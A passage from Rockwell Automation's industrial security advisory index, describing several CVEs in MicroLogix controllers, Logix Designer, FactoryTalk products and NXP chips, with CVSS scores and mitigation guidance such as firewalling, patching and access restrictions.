A remote, unauthenticated attacker may be able to send specially crafted Modbus packet which would allow the attacker to retrieve or modify random values in the register. If successfully exploited, this may lead to a buffer overflow resulting in a denial-of-service condition. The FAULT LED will flash RED and communications may be lost. Recovery from denial-of-service condition requires the fault to be cleared by the user.

CVSS v3.1 Base Score: 8.1/10[HIGH]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:H

Risk Mitigation & User Action

Customers using the affected controller are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy.

All users, if applicable, may disable Modbus TCP support if it is not necessary for their MicroLogix 1400 implementation. Without Modbus TCP enabled, a potential attacker does not have access to exploit the device using this vulnerability.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products

Utilize proper network infrastructure controls (such as firewalls) to help ensure Modbus TCP from unauthorized sources are blocked.
Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see Knowledgebase Article BF7490.

Software/PC-based Mitigation Strategies

Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
Use of Microsoft® AppLocker or other similar allow list application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article QA17329.
Ensure that the least-privilege user principle is followed and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.

General Mitigations

Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715.
Locate control system networks and devices behind firewalls and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please see our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation at PN1354 - Industrial Security Advisory Index. .

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

Medium

PN794 | PN794 | RSLogix 5000 Studio 5000 Logix Designer Source Protection Vulnerability

Published Date:

January 25, 2021

Last Updated:

January 25, 2021

CVE IDs:

CVE-2014-0755

Products:

Logix Designer

CVSS Scores:

6.3

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

2.0

Revision History

Version 2.0 – January 25, 2021 – Advisory updated for clarification.

Revision History

Revision Number

1.0

Revision History

Version 1.0 – February 04, 2014 – Initial Release. Originally Titled “RSLogix™ 5000 Password Vulnerability”.

Executive Summary

It has come to Rockwell Automation’s attention that a vulnerability exists in RSLogix 5000^®and Studio 5000 Logix Designer^® that, when exploited, provides access to content that was secured using Source Key Protection, and in some instances, may expose the password used for that protection.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

Project content applying access control with Source Key Protection using an sk.dat file in RSLogix 5000 and/or Studio 5000 product software v7 and above.

Note: This does not apply to project content protected with License Source Protection. To determine what solution is in use, refer to Logix 5000 Controllers Security, 1756-PM016O-EN-P.

Vulnerability Details

CVE-2014-0755: Insufficiently Protected Credentials
A vulnerability exists in RSLogix 5000 and Studio 5000 Logix Designer that, when exploited, may allow a local, unauthenticated attacker to access and modify project files that are password protected using Source Key Protection and, in some instances, may expose those passwords. Project files include files with the ACD, L5X, or L5K extensions. Successful exploitation will not directly disrupt the operation of Rockwell Automation programmable controllers or other devices in the control system.

CVSS v2 Base Score: 6.3
CVSS v2 Vector: AV:L/AC:M/AU:N/C:C/I:C/A:N

Risk Mitigation & User Action

Customers using the affected software versions are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed toward the risk mitigation strategies provided below and are encouraged, when possible, to combine these tactics with the general security guidelines to employ multiple strategies simultaneously.

Vulnerability Details

Recommended User Actions

CVE-2014-0755

Risk Mitigation Strategy A:
For stronger protection, apply License Source Protection introduced in v26.

To apply License Source Protection to content that is protected with Source Key Protection, the Source Key Protection must be removed prior to applying License Source Protection. Once content is protected with License Source Key, it must be downloaded to the appropriate controller to mitigate the risk associated with this vulnerability. Refer to Logix
5000 Controllers Security, 1756-PM016O-EN-P (rockwellautomation.com) for more information about Source Protection

Risk Mitigation Strategy B:
In addition to using current software, we also recommend the following actions to concerned customers who continue to use Source Key Protection. Where possible:

Adopt a practice to track creation and distribution of protected ACD files, including duplicates and derivates that contain protected content if these files may need to be found or potentially disposed of in the future.

Securely archive project files that contain content password protected with Source Key Protection in a manner that prevents unauthorized access. For instance, store project files that use Source Key Protection in physical and logical locations where access can be controlled, and the files are stored in a protected and potentially encrypted manner.

Securely transmit project files that contain content password protected with Source Key Protection in a manner that prevents unauthorized access. For instance, email stored project files that use Source Key Protection only to known recipients and encrypt the files such that only the target recipient can decrypt the content.

Restrict the physical network access to controllers containing password protected content only to authorized parties to help prevent unauthorized uploading of protected material in an ACD file. Note: For some customers, FactoryTalk Security software may be a suitable option to assist customers with applying a role-based access control solution to their system. FactoryTalk Security was integrated into RSLogix 5000 v10.00 and above.

Adopt a password management practice to periodically change passwords applied to routines and Add-On Instructions to help mitigate the risk that a learned password may remain useable for an extended period or indefinitely.

IMPORTANT: Files with Source Key Protection password protected content that have been opened and updated using v20.03 software and above will no longer be compatible with earlier versions of the software. For example, a v20.01 project file with password protected content that has been opened and re-saved using v20.03 software can only be opened with v20.03 software and higher. Also, a v21.00 project file with protected content that has been opened and re-saved using v21.03 software can only be opened with v21.03 and higher versions of software.

For the procedure to update older project files to v20.03 (or later), refer to the FAQ for V20.03 at KnowledgeBase ID: IN64.

General Security Guidelines

Software/PC-based Mitigation Strategies
The following Software/PC Mitigations may be appropriate to include when the vulnerability is within a software product running on a PC:

Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
Use of Microsoft AppLocker or other similar allow list application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article ID QA17329.
Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.

General Mitigations

Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.

Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID PN715..
Locate control system networks and devices behind firewalls and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

High

PN1540 | PN1540 | FactoryTalk Linx and FactoryTalk Services Platform Contain Denial-of-Service Vulnerabilities

Published Date:

January 22, 2021

Last Updated:

January 22, 2021

CVE IDs:

CVE-2020-5806, CVE-2020-5801, CVE-2020-5802, CVE-2020-5807

Products:

FactoryTalk Linx Gateway, FactoryTalk Services Platform, FactoryTalk Linx / RSLinx Enterprise

CVSS Scores:

7.5, 6.2, 4.3

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

2.0

Revision History

Version 3.0 - January 22, 2021. Updated and Corrected Risk Mitigation & User Actions.

Version 2.0 - January 14, 2021. Updated Risk Mitigation & User Actions.

Version 1.0 - December 27, 2020. Initial Version.

Executive Summary

Rockwell Automation received a report from Tenable regarding 4 vulnerabilities. Three of these vulnerabilities are within FactoryTalk® Linx software and the fourth is in FactoryTalk Services Platform. If successfully exploited, these vulnerabilities may result in denial-of-service conditions.

Nearly all FactoryTalk software ships with a FactoryTalk Services Platform. If you are unsure if you have the FactoryTalk Services Platform installed, please see Knowledgebase ID QA5266 for additional details.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

Vulnerability	Affected Products
CVE-2020-5801	FactoryTalk Linx version 6.20 and earlier.
CVE-2020-5802	FactoryTalk Linx version 6.20 and earlier.
CVE-2020-5806	FactoryTalk Linx versions 6.10, 6.11, and 6.20.
CVE-2020-5807	FactoryTalk Services Platform version 6.20 and earlier.

Vulnerability Details

CVE-2020-5801 and CVE-2020-5802: Denial-of-Service due to Unhandled Exception
An unhandled exception vulnerability exists within a .dll in FactoryTalk Linx. This vulnerability could allow a remote, unauthenticated attacker to send a malicious packet resulting in the termination of RSLinxNG.exe causing a denial of service condition.

CVSS v3.1 Base Score: 7.5 [HIGH]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2020-5806: Denial-of-Service due to Buffer Overflow
A buffer overflow vulnerability exists within a .dll in FactoryTalk Linx. This vulnerability could allow a local, unauthenticated attacker to send a malicious packet resulting in the termination of RSLinxNG.exe causing a denial-of-service condition.

CVSS v3.1 Base Score: 6.2 [MEDIUM]
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2020-5807: Denial-of-Service due to Buffer Overflow
A buffer overflow vulnerability exists within a .dll in FactoryTalk Services Platform. This vulnerability could be exploited via a phishing attack in which an attacker sends a specially crafted log file to a local user. When the malicious log file is opened by a local user, it can cause a buffer overflow in the FactoryTalk Services Platform resulting in temporary denial-of-service conditions. Users can recover from the condition by reopening the impacted software.

CVSS v3.1 Base Score: 4.3 [MEDIUM]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Risk Mitigation & User Action

Customers using the affected software are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy. Please subscribe to updates to this advisory and the Industrial Security Advisory Index to stay notified.

Version 3.0: Correction

Vulnerability	Suggested Actions
CVE-2020-5801 CVE-2020-5802	Version 2.0: Apply patch found in BF26285. Version 1.0: Apply Internet Protocol Security (IPSec) to provide security services for IP network traffic. For more information on how to apply IPSec, see Knowledge Base ID QA46277 .
CVE-2020-5806	Version 3.0: Apply patch found in BF26287
CVE-2020-5807	For FactoryTalk Services Platform v6.20 see Patch Answer ID BF26157.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products

Utilize proper network infrastructure controls, such as firewalls, to help ensure that traffic from unauthorized sources are blocked.
Consult the product documentation for specific features, such as a hardware keyswitch setting, to which may be used to block unauthorized changes, etc.
Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation^® products, see Knowledgebase Article ID BF7490.

Software/PC-based Mitigation Strategies

Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
Use Microsoft^® AppLocker or other similar allow list applications that can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article ID QA17329.
Confirm that the least-privilege user principle is followed and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

Social Engineering Mitigation Strategies

Do not open untrusted .ftd files with FactoryTalk Services Platform.
Do not click on or open URL links from untrusted sources.
Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.

General Mitigations
Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.

Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID PN715.
Locate control system networks and devices behind firewalls and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

High

PN1113 | PN1113 | CVE-2020-0601 Impact to Rockwell Automation Products

Published Date:

January 20, 2021

Last Updated:

January 20, 2021

CVE IDs:

CVE-2020-0601

Products:

FactoryTalk Analytics for Devices, FactoryTalk Analytics LogixAI, 1756 ControlLogix I/O

CVSS Scores:

8.1

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

2.0

Revision History

Version 2.0 - January 20, 2021 - Updated Risk Mitigations and Recommended User Actions.
Version 1.1 - January 31, 2020
Version 1.0 - January 17, 2020

Executive Summary

On Tuesday, January 14, 2020, Microsoft issued a patch and advisory addressing a major crypto vulnerability affecting Windows 10, Windows 10 IoT Core and Enterprise, and Windows Server 2016 and 2019. This vulnerability, identified as CVE-2020-0601, is also being referred to as "CurveBall," and is a vulnerability that exists in the way Crypt.32.dll validates Elliptic Curve Cryptography (ECC) certificates. This vulnerability breaks the chain of trust and could allow an attacker to sign a malicious executable, allow interception and modification of TLS-encrypted traffic, or spoof Authenticode code signing certificates. The National Security Agency (NSA) coordinated the information and release of this vulnerability with Microsoft.

The Rockwell Automation® Product Security Incident Response Team (PSIRT) has been tracking this vulnerability since its release. At the time of writing, Rockwell Automation products are not being directly targeted, but are impacted by vulnerable Windows 10 IoT installations. Please see the Affected Products for a full list of potentially affected Rockwell Automation products.

An investigation is ongoing. Currently, Rockwell Automation is working to address these vulnerabilities and will continue to provide updates as information becomes available.

Affected Products

Microsoft Windows 10 IoT Core and Enterprise editions are impacted by this vulnerability. At of the time of publishing, the following Rockwell Automation products are impacted by CVE-2020-0601:

CompactLogix 5480 Controllers
FactoryTalk Analytics for Devices
FactoryTalk Analytics LogixAI
ControlLogix Compute Module (1756-CMS1B1)

Vulnerability Details

CVE: 2020-0601: Windows CryptoAPI Spoofing Vulnerability

Description: A vulnerability exists in the way Windows CryptoAPI validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source.

Microsoft Assigned CVSSv3.0 Base Score: 8.1
Microsoft Assigned CVSSv3.0 Vector String: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Risk Mitigation & User Action

Customers should understand their potential exposure to this vulnerability by completing a thorough asset inventory and assessment.

Vulnerability	Rockwell Automation Product	Suggested Actions
CVE-2020-0601	Compact Logix 5480 Controllers ControlLogix Compute Module (1756-CMS1B1)	Microsoft released a patch for affected versions of Windows on January 14, 2020. Patch via Windows Update Service or normal patching process.
CVE-2020-0601	FactoryTalk Analytics Logix AI	Install the Microsoft Cumulative Security Updates on FactoryTalk Analytics LogixAI, refer to QA58887.

Otherwise, Rockwell Automation will provide a firmware update for the products noted. Patches are not yet available for these products. When the patches are available, this article will be updated.

Vulnerability

Rockwell Automation Product

Suggested Actions

CVE-2020-0601

FactoryTalk Analytics for Devices

To reduce risk, customers should ensure they are employing proper network segmentation and security controls.
Specifically, network exposure for all control system devices should be minimized and control systems should be
behind firewalls and isolated from other networks when possible.
Refer to the Deploying a Resilient Converged Plantwide Ethernet Architecture Design and Implementation Guide.

Customers using Rockwell Automation industrial compute solutions, such as VersaView computers, Industrial Data Centers, etc, are recommended to regularly inventory and patch their host operating systems.

Update on 1/31/2020: Rockwell Automation MS Patch Qualification team successfully qualified the Microsoft patch related to Curveball. Full results and other useful information can be found here.

General Security Guidelines

Utilize proper network infrastructure controls, such as firewalls, to help ensure that communications from unauthorized sources are blocked.
Use trusted software, software patches, antivirus/antimalware programs, and interact only with trusted web sites and attachments.
Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID 494865.
Locate control system networks and devices behind firewalls, and isolate them from the business network.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

High

PN1548 | PN1548 | Allen-Bradley MicroLogix 1100 Programmable Logic Controller IPv4 Denial-of-Service Vulnerability

Published Date:

January 19, 2021

Last Updated:

January 19, 2021

CVE IDs:

CVE-2020-6111

Products:

1763 MicroLogix 1100

CVSS Scores:

7.5

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 - January 19, 2021. Iniital Release.

Executive Summary

Rockwell Automation received a report from the Cisco® Talos™ team, regarding a vulnerability in the Allen-Bradley® MicroLogix™ 1100 controller. If successfully exploited, these vulnerabilities may result in denial-of-service conditions.

Customers using affected versions of this controller are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

MicroLogix 1100, all versions.

Vulnerability Details

CVE-2020-6111: Improper Processing IPv4 Packets may result in Denial-of-Service Conditions
A vulnerability exists with the processing of ICMP packets with an invalid IPv4 length in the MicroLogix 1100. This vulnerability could allow a remote, unauthenticated attacker to send malformed packets and cause the controller to enter 8H Hard Fault. This event would lead to denial-of-service conditions. To recover from the condition, the controller must be power cycled and the project redownloaded.

CVSS v3.1 Base Score: 7.5/10[HIGH]
CVSS v3.1 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Risk Mitigation & User Action

Customers using the affected controllers are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy. Please subscribe to updates to this advisory and the Industrial Security Advisory Index to stay notified.

Vulnerability	Suggested Actions
CVE-2020-6111	Migrate to MicroLogix 1400 and apply firmware v21.006 or later.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products

Utilize proper network infrastructure controls, such as firewalls, to help ensure that traffic from unauthorized sources are blocked.
Consult the product documentation for specific features, such as a hardware key mode setting, to which may be used to block unauthorized changes, etc.
Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see Knowledgebase Article ID BF7490.

General Mitigations

Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID PN715.
Locate control system networks and devices behind firewalls and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the KnoweldgeBase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

Medium

PN1542 | PN1542 | Side-Channel Issue on NXP 7x Secure Authentication Microcontrollers May Lead to ECC Key Extraction

Published Date:

January 14, 2021

Last Updated:

January 14, 2021

CVE IDs:

CVE-2021-3011

Products:

5069-L330ERMS2K, 5069-L340ERMS2, PowerFlex 6000, 5069-L3100ERS2, PowerFlex 755, 5069-L3100ERMS2, 5069-L306ERMS2, 2198 Kinetix 5700 Drive, iTRAK, 5069-L350ERMS2K, 5069-L320ERMS2K, 5069-L320ERMS2, 5069-L330ERS2K, 5069-L330ERMS2, 5069-L320ERS2K, 5069-L350ERS2K, 5069 Compact GuardLogix 5380, 5069-L380ERMS2, PowerFlex 755T, 1756 ControlLogix, 5069-L350ERMS2, 5069-L380ERS2

CVSS Scores:

4.9

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 - January 14, 2021. Initial Release.

Executive Summary

A report has been released regarding a vulnerability in the NXP 7x series microcontroller. If successfully exploited, this vulnerability may result in the extraction of a unique private key. This unique key is used to verify the authenticity of the affected Rockwell Automation^®products.

Customers using affected products are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

1756-EN2T
1756-EN4T
1756-EN4TR
ControlLogix^® 5580 Series
- 1756-L81EK, -L82EK, -L83EK, -L84EK, -L85EK
- 1756-L81EP, -L83EP, -L85EP
- 1756-L81E-NSE, 1756-L82E-NSE, 1756-L83E-NSE, 1756-L84E-NSE, 1756-L85E-NSE
- 1756-L81EXT, 1756-L82EXT, 1756-L83EXT, 1756-L84EXT, 1756-L85EXT
GuardLogix 5580 Series
- 1756-L81ES, -L82ES, -L83ES, -L84ES, -L8SP
- 1756-L81ESK, -L82ESK, -L83ESK, -L84ESK, -L8SPK
Compact GuardLogix^® 5380 Series
- 5069-L306ERMS2
- 5069-L306ERMS3
- 5069-L306ERS2
- 5069-L3100ERMS2
- 5069-L3100ERMS3
- 5069-L3100ERS2
- 5069-L310ERMS2
- 5069-L310ERMS3
- 5069-L310ERS2
- 5069-L320ERMS2
- 5069-L320ERMS2K
- 5069-L320ERMS3
- 5069-L320ERMS3K
- 5069-L320ERS2
- 5069-L320ERS2K
- 5069-L330ERMS2
- 5069-L330ERMS2K
- 5069-L330ERMS3
- 5069-L330ERMS3K
- 5069-L330ERS2
- 5069-L330ERS2K
- 5069-L340ERMS2
- 5069-L340ERMS3
- 5069-L340ERS2
- 5069-L350ERMS2
- 5069-L350ERMS2K
- 5069-L350ERMS3
- 5069-L350ERMS3K
- 5069-L350ERS2
- 5069-L350ERS2K
- 5069-L380ERMS2
- 5069-L380ERMS3
- 5069-L380ERS2
CompactLogix™ 5380 Series
- 5069-L306ER
- 5069-L306ERM
- 5069-L310ER
- 5069-L310ER-NSE
- 5069-L310ERM
- 5069-L320ER
- 5069-L320ERM
- 5069-L320ERMK
- 5069-L320ERP
- 5069-L330ER
- 5069-L330ERM
- 5069-L330ERMK
- 5069-L340ER
- 5069-L340ERM
- 5069-L340ERP
- 5069-L350ERM
- 5069-L350ERMK
- 5069-L380ERM
- 5069-L3100ERM
5069-AEN2TR
CompactLogix™5480 Series
- 5069-L4100ERMW
- 5069-L4200ERMW
- 5069-L430ERMW
- 5069-L450ERMW
- 5069-L46ERMW
iTRAK^® 5730 Small Frame
iTRAK 5750C
Kinetix^® 5700 Series B - DAI, HPI, LFI, AFE
PowerFlex^®6000T
PowerFlex 755 TL
PowerFlex 755 TM
PowerFlex 755 TR

Vulnerability Details

CVE-2021-3011: Side-Channel Leakage of Unique ECC Private Key on NXP 7X Series Chip
The NXP A700X chip contains a vulnerability that may allow an attacker to physically extract ECC private keys. Expertise and specialized equipment are required to successfully open the package, extract, and process the side-channel leakage. Successful exploit of this vulnerability may allow an attacker to obtain the unique ECC private key for that chip only. The chip will also be physically damaged. For controllers, the current use of this unique key is only used during the initial deployment of CIP Security.

CVSS v3.1 Base Score: 4.9/10[MEDIUM]
CVSS v3.1 Vector: CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N

Risk Mitigation & User Action

Rockwell Automation encourages customers, when possible, to follow industry best practices for physical access including, but not limited to:
•           Limiting physical access to authorized personnel: control room, cells/areas, control panels, and devices.
•           Providing training and communication to personnel to raise awareness of threats.
•           Implementing physical barriers such as locked cabinets.

Please subscribe to updates to this advisory and the Industrial Security Advisory Index to stay notified.

General Security Guidelines

General Mitigations

Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715.
Locate control system networks and devices behind firewalls and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

High

PN1541 | PN1541 | FactoryTalk AssetCentre affected by M and M Software fdtCONTAINER Remote Code Execution Vulnerability

Published Date:

January 11, 2021

Last Updated:

January 11, 2021

CVE IDs:

CVE-2020-12525

Products:

FactoryTalk AssetCentre

CVSS Scores:

8.6

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

January 11, 2021. Initial Version.

Executive Summary

Rockwell Automation received a report from M&M Software regarding vulnerabilities in the fdtCONTAINER component. fdtCONTAINER is distributed as part of FactoryTalk® AssetCentre software. If successfully exploited, this vulnerability may result in remote code execution.

This vulnerability does not impact FactoryTalk AssetCentre users who have not purchased the Process Device Configuration (SKU: 9515-ASTPRD*) capability or Calibration Management capability (SKU: 9515-ASTCAL*).

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

FactoryTalk AssetCentre v9.00.00 and below with Process Device Configuration or Calibration Management capabilitiy.

Vulnerability Details

CVE-2020-12525: Deserialization of Untrusted Data May Result in Remote Code Execution
A deserialization vulnerability exists in the ftdCONTAINER component in FactoryTalk AssetCentre. This vulnerability could be exploited via a phishing attack in which an attacker sends a specially crafted project file to a local user. When the malicious project file is opened by the local user, it may execute malicious code with the user rights of FactoryTalk AssetCentre.

CVSS v3.1 Base Score: 8.6/10 [HIGH]
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

Customers using the affected versions of FactoryTalk AssetCentre are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

Vulnerability	Suggested Actions
CVE-2020-12525	Deny access to PDC Field Edition. To do this, follow the steps below.

To deny access to PDC Field Edition:

Open FactoryTalk Admin Console
Select “System”
Select “Policies”
Select “FactoryTalk AssetCentre”
Open “Feature Security Properties”
Locate “Run PDC Field Edition” under “Process Device Configuration Policies” and select the ellipses (…) next to “Configure Security”.
Select the “Deny” Checkboxes for “Administrators” and “All Users”
Select “OK”
Select “Apply”

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products

